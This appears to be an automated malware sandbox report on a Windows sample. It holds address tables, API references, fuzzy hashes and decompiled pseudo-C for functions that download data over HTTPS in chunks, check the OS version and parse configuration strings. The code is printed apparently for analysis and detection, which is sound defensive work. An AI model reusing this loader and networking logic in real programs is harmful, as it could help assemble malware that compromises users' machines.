0x012b79af
0x012b79b4
0x012b7a4c
0x012b7a4c
0x00000000
0x012b7a52
0x012b79bf
0x012b79c8
0x012b79dc
0x012b79e3
0x012b79f8
0x012b79fe
0x012b7a06
0x00000000
0x00000000
0x00000000
0x00000000
0x012b7a08
0x012b7a08
0x012b7a08
0x012b7a0f
0x012b7a17
0x00000000
0x00000000
0x012b7a19
0x012b7a22
0x00000000
0x00000000
0x00000000
0x012b7a24
0x012b7a26
0x012b7a29
0x012b7a29
0x012b7a2c
0x012b7a30
0x012b7a33
0x012b7a39
0x012b7a3c
0x012b7a43
0x00000000
0x012b79bf
0x012b793a
0x012b7942
0x012b7948
0x012b794a
0x012b794a
0x012b794d
0x012b794f
0x00000000
0x012b794f
0x012b7929
0x012b796f
0x012b7974
0x012b7976
0x012b7976
0x012b7979
0x012b7979
0x00000000

APIs

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

lstrcpy.KERNEL32(69B25F45,00000020), ref: 012B79E3
lstrcat.KERNEL32(69B25F45,00000020), ref: 012B79F8
lstrcmp.KERNEL32(00000000,69B25F45), ref: 012B7A0F
lstrlen.KERNEL32(69B25F45), ref: 012B7A33

Strings

, xrefs: 012B797C

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: b8dffb07f41c03d5c59d69c93c02765ca95d82c7de2937513110d8b8925e72b7
Instruction ID: 6a4842bcb25790d6b97bf82a884dde3a57354f70baf928b6482e6b85a36ddafe
Opcode Fuzzy Hash: b8dffb07f41c03d5c59d69c93c02765ca95d82c7de2937513110d8b8925e72b7
Instruction Fuzzy Hash: F351C231A1020AEBDF21CF9DC5C46EDBBB6FF95394F148056EA55AB282C7709B11CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFC1E0, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1541COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,6ED8C338,000008BB), ref: 6ECFD345

Strings

1, xrefs: 6ECFDB8D
N, xrefs: 6ECFD29D

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: FileModuleName
String ID: 1$N
API String ID: 514040917-3127171972
Opcode ID: 6e74c4182ec39160bd6cd1ef22e06da5858a609784d352e38ea13f6de0602b26
Instruction ID: e9e682c666384684f1587f6406711de40615ed1304511afd48608f06436a6cb9
Opcode Fuzzy Hash: 6e74c4182ec39160bd6cd1ef22e06da5858a609784d352e38ea13f6de0602b26
Instruction Fuzzy Hash: A2036D71524960CEEBC8CF69C69067E7BF2FB97300B14812AD545AA3CDE33D558AEB04

Uniqueness

Uniqueness Score: -1.00%

Function 012B4F07, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E012B4F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x12bd130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E012B75F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x12bd2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E012B4AAB(_v20);
											if(_v8 == 0) {
												_t54 = E012B3B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E012B121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x012b4f08
0x012b4f0e
0x012b4f19
0x012b4f19
0x012b4f1b
0x012b7613
0x012b7616
0x012b761f
0x012b7622
0x012b7625
0x012b762d
0x012b772b
0x012b7731
0x012b7739
0x012b773b
0x00000000
0x012b773b
0x012b7633
0x012b7636
0x012b773e
0x012b773e
0x012b763c
0x012b7643
0x012b764b
0x012b7722
0x012b7651
0x012b7657
0x012b765c
0x012b7661
0x012b7710
0x012b7667
0x00000000
0x012b7667
0x012b7667
0x012b7667
0x012b7667
0x012b766c
0x012b766e
0x012b766e
0x012b767b
0x012b7683
0x00000000
0x00000000
0x012b7685
0x012b7692
0x012b7698
0x012b7698
0x012b769b
0x00000000
0x00000000
0x012b769d
0x012b76a8
0x012b76bc
0x012b76f2
0x012b76be
0x012b76be
0x012b76c5
0x012b76cd
0x00000000
0x012b76cf
0x012b76cf
0x012b76d5
0x012b76dd
0x012b76e4
0x00000000
0x012b76e4
0x012b76dd
0x012b76cd
0x012b76f5
0x012b76f8
0x012b7700
0x012b7706
0x012b770b
0x012b770b
0x00000000
0x012b7700
0x012b76a5
0x00000000
0x012b76e7
0x012b76e7
0x00000000
0x012b76f0
0x012b7717
0x012b7717
0x012b771d
0x012b771d
0x012b764b
0x012b7636
0x012b7748
0x012b4f10
0x012b4f10
0x012b4f17
0x012b4f22
0x00000000
0x00000000
0x00000000
0x012b4f17

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 012B76AF
GetLastError.KERNEL32 ref: 012B76CF

Part of subcall function 012B121A: wcstombs.NTDLL ref: 012B12DC

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 2269dd0148359b74d8acbb4116b451ca47ffdbffb1911247a047712617c00951
Instruction ID: cca5e3d6eaa6c4e42b849bc40cb3db1efa4e6b27bda5a17fdb6fb5abe564ef54
Opcode Fuzzy Hash: 2269dd0148359b74d8acbb4116b451ca47ffdbffb1911247a047712617c00951
Instruction Fuzzy Hash: 42413F70D2020AEFDF21AFA8D9C89EDBBB8FF44384F144869E602E7181D7709A40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B3DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 012B3DFD
SysAllocString.OLEAUT32(012B28D9), ref: 012B3E41
SysFreeString.OLEAUT32(00000000), ref: 012B3E55
SysFreeString.OLEAUT32(00000000), ref: 012B3E63

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8813cc75259235e607456b7902cbbf79c451f7d147837d2ae0f972e5edee3d3b
Instruction ID: 4bc829299379427ced7115265031621983f3a02cd0e87199c5a140d047422fbe
Opcode Fuzzy Hash: 8813cc75259235e607456b7902cbbf79c451f7d147837d2ae0f972e5edee3d3b
Instruction Fuzzy Hash: 4C312D7691024AEFCB15CF98D8C48EE7BB9FF48340B11842EFA0697251D7709A45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 012B9311, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E012B9311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x12bd364; // 0x52495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x12bd364; // 0x52495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x12bd030) {
					HeapFree( *0x12bd270, 0, _t8);
				}
				_t9 = E012B5141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x12bd364; // 0x52495b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x012b9311
0x012b9311
0x012b931a
0x012b932a
0x012b932a
0x012b932f
0x012b9334
0x00000000
0x00000000
0x012b9324
0x012b9324
0x012b9336
0x012b933a
0x012b934c
0x012b934c
0x012b9357
0x012b935c
0x012b935f
0x012b9364
0x012b9368
0x012b936e

APIs

RtlEnterCriticalSection.NTDLL(05249570), ref: 012B931A
Sleep.KERNEL32(0000000A,?,012B5390), ref: 012B9324
HeapFree.KERNEL32(00000000,00000000,?,012B5390), ref: 012B934C
RtlLeaveCriticalSection.NTDLL(05249570), ref: 012B9368

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 52dccbbcc1eefbde8f91645f6df240bff74b01e66b861f87890a2213f4132b9f
Instruction ID: 48deb947e3d7ea7d77e9bcd6f9e24997f039d0efa04a5828fd5a1dffae9a4463
Opcode Fuzzy Hash: 52dccbbcc1eefbde8f91645f6df240bff74b01e66b861f87890a2213f4132b9f
Instruction Fuzzy Hash: 9CF012B162A2429BEB349FA8FDCDF963BA4FF15388B045814F741C7296C620E890CF15

Uniqueness

Uniqueness Score: -1.00%

Function 012B121A, Relevance: 4.6, APIs: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E012B121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fe5fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E012B75F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E012B75F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E012B4AAB(_v20);
					}
					goto L12;
				}
			}

0x012b1220
0x012b1227
0x012b122a
0x012b122d
0x012b122f
0x012b1234
0x012b1317
0x012b131d
0x012b131d
0x012b123e
0x012b1245
0x012b124d
0x012b130e
0x012b1314
0x00000000
0x012b1314
0x012b1256
0x012b125a
0x012b125b
0x012b125c
0x012b1262
0x012b1263
0x012b1268
0x012b126f
0x00000000
0x012b1275
0x012b1284
0x012b1287
0x012b128a
0x012b1293
0x012b1298
0x012b129d
0x012b1305
0x012b129f
0x012b12a2
0x012b12a6
0x012b12a7
0x012b12a8
0x012b12a9
0x012b12ab
0x012b12b2
0x012b12f8
0x012b12b4
0x012b12b4
0x012b12bf
0x012b12cd
0x012b12d1
0x012b12e9
0x012b12d3
0x012b12dc
0x012b12e4
0x012b12e4
0x012b12d1
0x012b12fe
0x012b12fe
0x00000000
0x012b129d

APIs

GetLastError.KERNEL32 ref: 012B130E

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

wcstombs.NTDLL ref: 012B12DC
GetLastError.KERNEL32 ref: 012B12F2

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID:
API String ID: 2631933831-0
Opcode ID: 3198e0a82692efe52b7bad5edd9fdb7933dbb4a37bfb5d6253dfd2e990ba5763
Instruction ID: 658c1ddcaccc1add8564c9ef687dfdaa615ea638b94b42feafeb4dc02105169f
Opcode Fuzzy Hash: 3198e0a82692efe52b7bad5edd9fdb7933dbb4a37bfb5d6253dfd2e990ba5763
Instruction Fuzzy Hash: 1F312BB5910209EFDB20DFA5D8C4AEEBBB8FF58344F104469E642E3241E7709A549B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B502E, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E012B37AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x12bd2e0; // 0x3f8a5a8
				_t4 = _t24 + 0x12bedc8; // 0x5249370
				_t5 = _t24 + 0x12bed70; // 0x4f0053
				_t26 = E012B4B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x12bd2e0; // 0x3f8a5a8
						_t11 = _t32 + 0x12bedbc; // 0x5249364
						_t48 = _t11;
						_t12 = _t32 + 0x12bed70; // 0x4f0053
						_t52 = E012B131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x12bd2e0; // 0x3f8a5a8
							_t13 = _t35 + 0x12bee06; // 0x30314549
							if(E012B117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x12bd294 - 6;
								if( *0x12bd294 <= 6) {
									_t42 =  *0x12bd2e0; // 0x3f8a5a8
									_t15 = _t42 + 0x12bec12; // 0x52384549
									E012B117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x12bd2e0; // 0x3f8a5a8
							_t17 = _t38 + 0x12bee00; // 0x52493a8
							_t18 = _t38 + 0x12bedd8; // 0x680043
							_t40 = E012B5DDA(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x12bd270, 0, _t52);
						}
					}
					HeapFree( *0x12bd270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E012B51BB(_t54);
				}
				return _t45;
			}

0x012b502e
0x012b503e
0x012b5041
0x012b5048
0x012b504a
0x012b504a
0x012b504d
0x012b5052
0x012b5059
0x012b5066
0x012b506b
0x012b506f
0x012b507d
0x012b508b
0x012b508f
0x012b5120
0x012b5120
0x012b5095
0x012b5095
0x012b509a
0x012b509a
0x012b50a1
0x012b50ad
0x012b50af
0x012b50b1
0x012b50b3
0x012b50ba
0x012b50cc
0x012b50ce
0x012b50d5
0x012b50d7
0x012b50de
0x012b50e9
0x012b50e9
0x012b50d5
0x012b50ee
0x012b50f3
0x012b50fa
0x012b510a
0x012b5118
0x012b511a
0x012b511a
0x012b50b1
0x012b512c
0x012b512c
0x012b512e
0x012b5133
0x012b5135
0x012b5135
0x012b5140

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05249370,00000000,?,7519F710,00000000,7519F730), ref: 012B507D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052493A8,?,00000000,30314549,00000014,004F0053,05249364), ref: 012B511A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,012B54EF), ref: 012B512C

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0a222177584f0cf64fc5f98796e93b5e2cded02f0aaa1aca685be92250c1f9c5
Instruction ID: f383358a667306854d06c865e17ae400e5207267a1cd3e19ba957b00b68262ed
Opcode Fuzzy Hash: 0a222177584f0cf64fc5f98796e93b5e2cded02f0aaa1aca685be92250c1f9c5
Instruction Fuzzy Hash: 9E31C13192014ABFDB21DFE8EDC8EEA3BBCEB08794F150065E601AB151D6719E09DB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B5141, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E012B5141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E012B75F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x12bc2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x012b5145
0x012b5152
0x012b5154
0x012b5155
0x012b515d
0x012b515d
0x012b5161
0x00000000
0x00000000
0x012b5158
0x012b5159
0x012b515c
0x012b515c
0x012b5169
0x012b516e
0x012b5173
0x012b517b
0x012b5181
0x012b5183
0x012b5186
0x012b518a
0x012b518c
0x012b518f
0x012b518f
0x012b5190
0x012b5192
0x012b518f
0x012b519c
0x012b519f
0x012b51a2
0x012b51a3
0x012b51a5
0x012b51ac
0x012b51ac
0x012b51b8

APIs

StrChrA.SHLWAPI(?,00000020,00000000,052495AC,012B5390,?,012B935C,?,052495AC,?,012B5390), ref: 012B515D
StrTrimA.SHLWAPI(?,012BC2A4,00000002,?,012B935C,?,052495AC,?,012B5390), ref: 012B517B
StrChrA.SHLWAPI(?,00000020,?,012B935C,?,052495AC,?,012B5390), ref: 012B5186

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 2868fdf66e7a1262ef7bdfb54fa95a69746eea2bc4326b5d5acdbcce5dc2aa8a
Instruction ID: 91b840ce9a62dacaf90fa328ef6665a6df69f17e56178feb058060fe75bb294d
Opcode Fuzzy Hash: 2868fdf66e7a1262ef7bdfb54fa95a69746eea2bc4326b5d5acdbcce5dc2aa8a
Instruction Fuzzy Hash: 49019A313203876EE7214A6E9CC9FA77F9DEB853C4F040011BB55CF282DA70D8028760

Uniqueness

Uniqueness Score: -1.00%

Function 012B7749, Relevance: 3.1, APIs: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E012B7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t34;
				long _t36;
				unsigned int _t37;
				signed int _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E012B1922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E012B4AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E012B1922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fe5f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E012B4AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E012B1922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x12bd2e0; // 0x3f8a5a8
										_t19 = _t42 + 0x12be758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E012B4AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}

0x012b7749
0x012b7758
0x012b775e
0x012b788f
0x012b788f
0x012b7764
0x012b7764
0x012b776a
0x012b776c
0x012b777c
0x012b777c
0x012b776e
0x012b776e
0x012b7777
0x012b7777
0x012b7770
0x012b7770
0x012b7775
0x00000000
0x00000000
0x00000000
0x00000000
0x012b7775
0x012b776e
0x012b778a
0x012b7791
0x012b7794
0x012b779c
0x00000000
0x012b77a2
0x012b77a4
0x012b77a9
0x012b77ae
0x00000000
0x012b77b4
0x012b77b4
0x012b77bd
0x012b77d4
0x012b77e0
0x012b77e9
0x012b77ec
0x012b77f4
0x00000000
0x012b77fa
0x012b77fd
0x012b7809
0x012b780f
0x00000000
0x012b7811
0x012b7814
0x012b781d
0x012b781d
0x012b7827
0x012b782e
0x012b7831
0x012b7836
0x012b783b
0x00000000
0x012b783d
0x012b783f
0x012b784b
0x012b784e
0x012b7856
0x012b7858
0x012b7869
0x012b7869
0x012b786b
0x012b786f
0x012b7870
0x012b7872
0x012b7879
0x00000000
0x012b787b
0x012b787b
0x012b787f
0x012b7880
0x012b7882
0x012b7889
0x00000000
0x012b788b
0x012b788b
0x012b788b
0x012b7889
0x012b7879
0x012b783b
0x012b780f
0x012b77bf
0x012b77ca
0x012b77ce
0x00000000
0x00000000
0x00000000
0x00000000
0x012b77ce
0x012b77bd
0x012b77ae
0x012b779c
0x012b7898

APIs

Part of subcall function 012B1922: lstrlen.KERNEL32(?,00000000,05249B38,00000000,012B74FF,05249D16,?,?,?,?,?,69B25F44,00000005,012BD00C), ref: 012B1929
Part of subcall function 012B1922: mbstowcs.NTDLL ref: 012B1952
Part of subcall function 012B1922: memset.NTDLL ref: 012B1964

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,012B544C,00000000,00000000,05249618,?,?,012B2A8A,?,05249618,0000EA60), ref: 012B7764
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,012B544C,00000000,00000000,05249618,?,?,012B2A8A,?,05249618,0000EA60), ref: 012B788F

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: f40a35ed292171208be3df45c103f45a116cd092c26c1363f070b71dc32c2ab6
Instruction ID: 7214ca31521d6cad586d635dc0a47654f5bcb151c0331bc04dec30f00f09638b
Opcode Fuzzy Hash: f40a35ed292171208be3df45c103f45a116cd092c26c1363f070b71dc32c2ab6
Instruction Fuzzy Hash: D041607212020ABFEB359FA4DCC8EEA7BBDEB44780F004529F74295090E771EA54DB60

Uniqueness

Uniqueness Score: -1.00%

